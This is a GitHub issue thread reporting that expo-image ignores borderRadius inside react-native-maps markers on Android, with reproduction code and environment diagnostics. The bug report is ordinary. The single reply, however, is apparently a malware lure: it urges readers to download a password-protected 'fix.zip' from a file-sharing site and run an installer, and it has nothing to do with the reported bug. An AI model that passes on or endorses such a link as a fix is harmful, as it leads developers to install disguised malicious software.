### ISSUE TITLE
Expo-Image ignore borderRadius in MapView

### ISSUE THREAD

**Issue by CleverTomatoe** [expo/expo#31215]
### Minimal reproducible example

https://github.com/CleverTomatoe/expo-image-borderRadius-bug/tree/main

### What platform(s) does this occur on?

Android

### Where did you reproduce the issue?

in a development build, in Expo Go, in a standalone app

### Summary

Using expo-image to replace the <mapView> default marker icon, will result in borderRadius to apply, encapsulating the 
<Image/> in a parent <View>, won't work either.
![bug](https://github.com/user-attachments/assets/01d085c2-3571-4d87-b4f6-7b8930878eaa)

I try all the variation I could think of, switching to react-native <Image/> worked.

```
import MapView, { Marker } from 'react-native-maps';
import { Image } from 'expo-image';
import {Image as ReactNativeImage} from 'react-native'

export default function app() {
  return (
    <MapView style={{flex:1}}>
      {/* borderRadius has no effect */}
      <Marker coordinate={{latitude:0,longitude:0}}  >
          <Image style={{height:50, width:50, borderRadius: 25}} source={{uri:'https://dgalywyr863hv.cloudfront.net/pictures/athletes/45051653/27714051/1/large.jpg'}}/>
      </Marker>
      {/* circle */}
      <Marker coordinate={{latitude:15,longitude:0}}  >
          <ReactNativeImage style={{height:50, width:50, borderRadius: 25}} source={{uri:'https://dgalywyr863hv.cloudfront.net/pictures/athletes/45051653/27714051/1/large.jpg'}}/>
      </Marker>
    </MapView>
  );
}
```

### Environment

  expo-env-info 1.2.0 environment info:
    System:
      OS: Windows 11 10.0.22631
    Binaries:
      Node: 20.15.1 - C:\Program Files\nodejs\node.EXE
      npm: 10.2.3 - C:\Program Files\nodejs\npm.CMD
    IDEs:
      Android Studio: AI-241.15989.150.2411.11948838
    npmPackages:
      expo: ~51.0.18 => 51.0.31
      expo-router: ~3.5.17 => 3.5.23
      react: 18.2.0 => 18.2.0
      react-dom: 18.2.0 => 18.2.0
      react-native: 0.74.3 => 0.74.3
      react-native-web: ~0.19.10 => 0.19.12
    Expo Workflow: bare

### Expo Doctor Diagnostics

✔ Check Expo config for common issues
✔ Check package.json for common issues
✔ Check native tooling versions
✔ Check dependencies for packages that should not be installed directly
✔ Check for common project setup issues
✔ Check npm/ yarn versions
✔ Check for issues with metro config
✔ Check if the project meets version requirements for submission to app stores
✖ Check for app config fields that may not be synced in a non-CNG project
✔ Check that native modules do not use incompatible support packages
✔ Check for legacy global CLI installed locally
✖ Check Expo config (app.json/ app.config.js) schema
✔ Check that packages match versions required by installed Expo SDK
✔ Check that native modules use compatible support package versions for installed Expo SDK

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
